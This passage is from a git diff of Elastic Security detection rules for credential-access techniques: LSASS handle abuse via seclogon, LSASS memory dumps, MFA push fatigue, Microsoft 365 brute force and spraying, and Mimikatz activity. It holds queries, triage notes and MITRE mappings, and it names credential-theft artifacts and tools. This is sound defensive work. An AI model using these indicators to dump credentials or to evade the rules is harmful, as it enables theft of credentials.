"keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "9092cd6c-650f-4fa3-8a8a-28256c7489c9", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -70,5 +93,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_lsass_handle_via_malseclogon.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_lsass_handle_via_malseclogon.json new file mode 100644 index 0000000000000..449a0b88e22b3 --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_lsass_handle_via_malseclogon.json @@ -0,0 +1,84 @@ +{ + "author": [ + "Elastic" + ], + "description": "Identifies suspicious access to LSASS handle from a call trace pointing to seclogon.dll and with a suspicious access rights value. This may indicate an attempt to leak an LSASS handle via abusing the Secondary Logon service in preparation for credential access.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious LSASS Access via MalSecLogon", + "note": "", + "query": "process where event.code == \"10\" and\n winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\" and\n\n /* seclogon service accessing lsass */\n winlog.event_data.CallTrace : \"*seclogon.dll*\" and process.name : \"svchost.exe\" and\n\n /* PROCESS_CREATE_PROCESS & PROCESS_DUP_HANDLE & PROCESS_QUERY_INFORMATION */\n winlog.event_data.GrantedAccess == \"0x14c0\"\n", + "references": [ + "https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html" + ], + "required_fields": [ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.CallTrace", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.GrantedAccess", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetImage", + "type": "unknown" + } + ], + "risk_score": 73, + "rule_id": "7ba58110-ae13-439b-8192-357b0fcfa9d7", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "severity": "high", + "tags": [ + "Elastic", + "Host", + "Windows", + "Threat Detection", + "Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_lsass_memdump_file_created.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_lsass_memdump_file_created.json index 444d6051c1250..c41287faed87e 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_lsass_memdump_file_created.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_lsass_memdump_file_created.json @@ -12,14 +12,32 @@ "language": "eql", "license": "Elastic License v2", "name": "LSASS Memory Dump Creation", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "file where file.name : (\"lsass*.dmp\", \"dumpert.dmp\", \"Andrew.dmp\", \"SQLDmpr*.mdmp\", \"Coredump.dmp\")\n", + "note": "", + "query": "file where file.name : (\"lsass*.dmp\", \"dumpert.dmp\", \"Andrew.dmp\", \"SQLDmpr*.mdmp\", \"Coredump.dmp\") and\n\n not (process.executable : (\"?:\\\\Program Files\\\\Microsoft SQL Server\\\\*\\\\Shared\\\\SqlDumper.exe\", \"?:\\\\Windows\\\\System32\\\\dllhost.exe\") and\n file.path : (\"?:\\\\Program Files\\\\Microsoft SQL Server\\\\*\\\\Shared\\\\ErrorDumps\\\\SQLDmpr*.mdmp\",\n \"?:\\\\*\\\\Reporting Services\\\\Logfiles\\\\SQLDmpr*.mdmp\")) and\n\n not (process.executable : \"?:\\\\WINDOWS\\\\system32\\\\WerFault.exe\" and\n file.path : \"?:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\lsass.exe.*.dmp\")\n", "references": [ "https://github.com/outflanknl/Dumpert", "https://github.com/hoangprod/AndrewSpecial" ], + "required_fields": [ + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "f2f46686-6f3c-4724-bd7d-24e31c70f98f", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -56,5 +74,5 @@ "timeline_title": "Comprehensive File Timeline", "timestamp_override": "event.ingested", "type": "eql", - "version": 9 + "version": 11 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_lsass_memdump_handle_access.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_lsass_memdump_handle_access.json index 7ac3bf448a672..ce9c7eb3988d1 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_lsass_memdump_handle_access.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_lsass_memdump_handle_access.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "LSASS Memory Dump Handle Access", - "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Handle Access\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible\nfor enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles\npassword changes, and creates access tokens.\n\nAdversaries may attempt to access credential material stored in LSASS process memory. After a user logs on,the system\ngenerates and stores a variety of credential materials in LSASS process memory. This is meant to facilitate single\nsign-on (SSO) ensuring a user isn\u2019t prompted each time resource access is requested. These credential materials can be\nharvested by an adversary using administrative user or SYSTEM privileges to conduct lateral movement using \n[alternate authentication material](https://attack.mitre.org/techniques/T1550/).\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve the process executable and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- There should be very few or no false positives for this rule. If this activity is expected or noisy in your environment,\nconsider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If the process is related to antivirus or endpoint detection and response solutions, validate that it is installed on\nthe correct path and signed with the company's valid digital signature.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Scope compromised credentials and disable the accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nAlso, this event generates only if the object\u2019s [SACL](https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists) has the required access control entry (ACE) to handle the use of specific access rights.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Handle Access\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible\nfor enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles\npassword changes, and creates access tokens.\n\nAdversaries may attempt to access credential material stored in LSASS process memory. After a user logs on,the system\ngenerates and stores a variety of credential materials in LSASS process memory. This is meant to facilitate single\nsign-on (SSO) ensuring a user isn\u2019t prompted each time resource access is requested. These credential materials can be\nharvested by an adversary using administrative user or SYSTEM privileges to conduct lateral movement using\n[alternate authentication material](https://attack.mitre.org/techniques/T1550/).\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve the process executable and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- There should be very few or no false positives for this rule. If this activity is expected or noisy in your environment,\nconsider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If the process is related to antivirus or endpoint detection and response solutions, validate that it is installed on\nthe correct path and signed with the company's valid digital signature.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Scope compromised credentials and disable the accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nAlso, this event generates only if the object\u2019s [SACL](https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists) has the required access control entry (ACE) to handle the use of specific access rights.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "query": "any where event.action == \"File System\" and event.code == \"4656\" and\n\n winlog.event_data.ObjectName : (\n \"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"\\\\Device\\\\HarddiskVolume?\\\\Windows\\\\System32\\\\lsass.exe\",\n \"\\\\Device\\\\HarddiskVolume??\\\\Windows\\\\System32\\\\lsass.exe\") and\n\n /* The right to perform an operation controlled by an extended access right. */\n\n (winlog.event_data.AccessMask : (\"0x1fffff\" , \"0x1010\", \"0x120089\", \"0x1F3FFF\") or\n winlog.event_data.AccessMaskDescription : (\"READ_CONTROL\", \"Read from process memory\"))\n\n /* Common Noisy False Positives */\n\n and not winlog.event_data.ProcessName : (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\system32\\\\wbem\\\\WmiPrvSE.exe\",\n \"?:\\\\Windows\\\\System32\\\\dllhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\*.exe\",\n \"?:\\\\Windows\\\\explorer.exe\")\n", "references": [ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656", @@ -20,8 +20,41 @@ "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-170105221010.html", "http://findingbad.blogspot.com/2017/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.AccessMask", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.AccessMaskDescription", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.ObjectName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.ProcessName", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "208dbe77-01ed-4954-8d44-1e5751cb20de", + "setup": "Ensure advanced audit policies for Windows are enabled, specifically:\nObject Access policies Event ID 4656 (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nAlso, this event generates only if the object\u2019s SACL has the required access control entry (ACE) to handle the use of specific access rights.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -56,5 +89,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_mfa_push_brute_force.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_mfa_push_brute_force.json index d7e78dacd0f5a..204d887636458 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_mfa_push_brute_force.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_mfa_push_brute_force.json @@ -10,13 +10,31 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Abuse of Repeated MFA Push Notifications", - "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "sequence by user.email with maxspan=10m\n [any where event.module == \"okta\" and event.action == \"user.mfa.okta_verify.deny_push\"]\n [any where event.module == \"okta\" and event.action == \"user.mfa.okta_verify.deny_push\"]\n [any where event.module == \"okta\" and event.action == \"user.authentication.sso\"]\n", "references": [ "https://www.mandiant.com/resources/russian-targeting-gov-business" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.module", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.email", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "97a8e584-fd3b-421f-9b9d-9c9d9e57e9d7", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "high", "tags": [ "Elastic", @@ -44,5 +62,5 @@ } ], "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_microsoft_365_brute_force_user_account_attempt.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_microsoft_365_brute_force_user_account_attempt.json index 26ba1d845ed35..7961d39fb09f8 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_microsoft_365_brute_force_user_account_attempt.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_microsoft_365_brute_force_user_account_attempt.json @@ -16,13 +16,47 @@ "language": "kuery", "license": "Elastic License v2", "name": "Attempts to Brute Force a Microsoft 365 User Account", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:o365.audit and event.provider:(AzureActiveDirectory or Exchange) and\n event.category:authentication and event.action:(UserLoginFailed or PasswordLogonInitialAuthUsingPassword) and\n not o365.audit.LogonError:(UserAccountNotFound or EntitlementGrantsNotFound or UserStrongAuthEnrollmentRequired or\n UserStrongAuthClientAuthNRequired or InvalidReplyTo)\n", "references": [ "https://blueteamblog.com/7-ways-to-monitor-your-office-365-logs-using-siem" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.LogonError", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "26f68dba-ce29-497b-8e13-b4fde1db5a2d", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "high", "tags": [ "Elastic", @@ -56,5 +90,5 @@ "value": 10 }, "type": "threshold", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_microsoft_365_potential_password_spraying_attack.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_microsoft_365_potential_password_spraying_attack.json index 06f77fe83ba14..c0a691820a0a1 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_microsoft_365_potential_password_spraying_attack.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_microsoft_365_potential_password_spraying_attack.json @@ -14,10 +14,39 @@ "language": "kuery", "license": "Elastic License v2", "name": "Potential Password Spraying of Microsoft 365 User Accounts", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:o365.audit and event.provider:(Exchange or AzureActiveDirectory) and event.category:authentication and \nevent.action:(\"UserLoginFailed\" or \"PasswordLogonInitialAuthUsingPassword\")\n", + "note": "", + "query": "event.dataset:o365.audit and event.provider:(Exchange or AzureActiveDirectory) and event.category:authentication and\nevent.action:(\"UserLoginFailed\" or \"PasswordLogonInitialAuthUsingPassword\")\n", + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "3efee4f0-182a-40a8-a835-102c68a4175d", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "high", "tags": [ "Elastic", @@ -51,5 +80,5 @@ "value": 25 }, "type": "threshold", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_mimikatz_memssp_default_logs.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_mimikatz_memssp_default_logs.json index e9f699e7a62a1..b322c9ec7d9f7 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_mimikatz_memssp_default_logs.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_mimikatz_memssp_default_logs.json @@ -12,10 +12,23 @@ "language": "eql", "license": "Elastic License v2", "name": "Mimikatz Memssp Log File Detected", - "note": "## Triage and analysis\n\n### Investigating Mimikatz Memssp Log File Detected\n\n[Mimikatz](https://github.com/gentilkiwi/mimikatz) is an open-source tool used to collect, decrypt, and/or use cached\ncredentials. This tool is commonly abused by adversaries during the post-compromise stage where adversaries have gained\nan initial foothold on an endpoint and are looking to elevate privileges and seek out additional authentication objects\nsuch as tokens/hashes/credentials that can then be used to laterally move and pivot across a network.\n\nThis rule looks for the creation of a file named `mimilsa.log`, which is generated when using the Mimikatz misc::memssp\nmodule, which injects a malicious Windows SSP to collect locally authenticated credentials, which includes the computer\naccount password, running service credentials, and any accounts that logon.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (e.g., 4624) to the target\nhost.\n- Retrieve and inspect the log file contents.\n- Search for DLL files created in the same location as the log file, and retrieve unsigned DLLs.\n - Use the PowerShell Get-FileHash cmdlet to get the SHA-256 hash value of these files.\n - Search for the existence of these files in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n - Identify the process that created the DLL using file creation events.\n\n### False positive analysis\n\n- This file name `mimilsa.log` should not legitimately be created.\n\n### Related rules\n\n- Mimikatz Powershell Module Activity - ac96ceb8-4399-4191-af1d-4feeac1f1f46\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the host is a Domain Controller (DC):\n - Activate your incident response plan for total Active Directory compromise.\n - Review the privileges assigned to users that can access the DCs to ensure that the least privilege principle is\n being followed and reduce the attack surface.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Reboot the host to remove the injected SSP from memory.\n- Reimage the host operating system or restore compromised files to clean versions.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Mimikatz Memssp Log File Detected\n\n[Mimikatz](https://github.com/gentilkiwi/mimikatz) is an open-source tool used to collect, decrypt, and/or use cached\ncredentials. This tool is commonly abused by adversaries during the post-compromise stage where adversaries have gained\nan initial foothold on an endpoint and are looking to elevate privileges and seek out additional authentication objects\nsuch as tokens/hashes/credentials that can then be used to laterally move and pivot across a network.\n\nThis rule looks for the creation of a file named `mimilsa.log`, which is generated when using the Mimikatz misc::memssp\nmodule, which injects a malicious Windows SSP to collect locally authenticated credentials, which includes the computer\naccount password, running service credentials, and any accounts that logon.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (e.g., 4624) to the target\nhost.\n- Retrieve and inspect the log file contents.\n- Search for DLL files created in the same location as the log file, and retrieve unsigned DLLs.\n - Use the PowerShell Get-FileHash cmdlet to get the SHA-256 hash value of these files.\n - Search for the existence of these files in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n - Identify the process that created the DLL using file creation events.\n\n### False positive analysis\n\n- This file name `mimilsa.log` should not legitimately be created.\n\n### Related rules\n\n- Mimikatz Powershell Module Activity - ac96ceb8-4399-4191-af1d-4feeac1f1f46\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the host is a Domain Controller (DC):\n - Activate your incident response plan for total Active Directory compromise.\n - Review the privileges assigned to users that can access the DCs to ensure that the least privilege principle is\n being followed and reduce the attack surface.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Reboot the host to remove the injected SSP from memory.\n- Reimage the host operating system or restore compromised files to clean versions.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "file where file.name : \"mimilsa.log\" and process.name : \"lsass.exe\"\n", + "required_fields": [ + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -43,5 +56,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_mimikatz_powershell_module.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_mimikatz_powershell_module.json index 0942b6fe8da8c..090c676cddc21 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_mimikatz_powershell_module.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_mimikatz_powershell_module.json @@ -11,14 +11,27 @@ "language": "kuery", "license": "Elastic License v2", "name": "Potential Invoke-Mimikatz PowerShell Script", - "note": "## Triage and analysis\n\n### Investigating Mimikatz PowerShell Activity\n\n[Mimikatz](https://github.com/gentilkiwi/mimikatz) is an open-source tool used to collect, decrypt, and/or use cached\ncredentials. This tool is commonly abused by adversaries during the post-compromise stage where adversaries have gained\nan initial foothold on an endpoint and are looking to elevate privileges and seek out additional authentication objects\nsuch as tokens/hashes/credentials that can then be used to move laterally and pivot across a network.\n\nThis rule looks for PowerShell scripts that load mimikatz in memory, like Invoke-Mimikataz, which are used to dump\ncredentials from the Local Security Authority Subsystem Service (LSASS). Any activity triggered from this rule should be\ntreated with high priority as it typically represents an active adversary.\n\nMore information about Mimikatz components and how to detect/prevent them can be found on [ADSecurity](https://adsecurity.org/?page_id=1821).\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - Invoke-Mimitakz and alike scripts heavily use other capabilities covered by other detections described in the\n \"Related Rules\" section.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the\ntarget host.\n - Examine network and security events in the environment to identify potential lateral movement using compromised credentials.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell PSReflect Script - 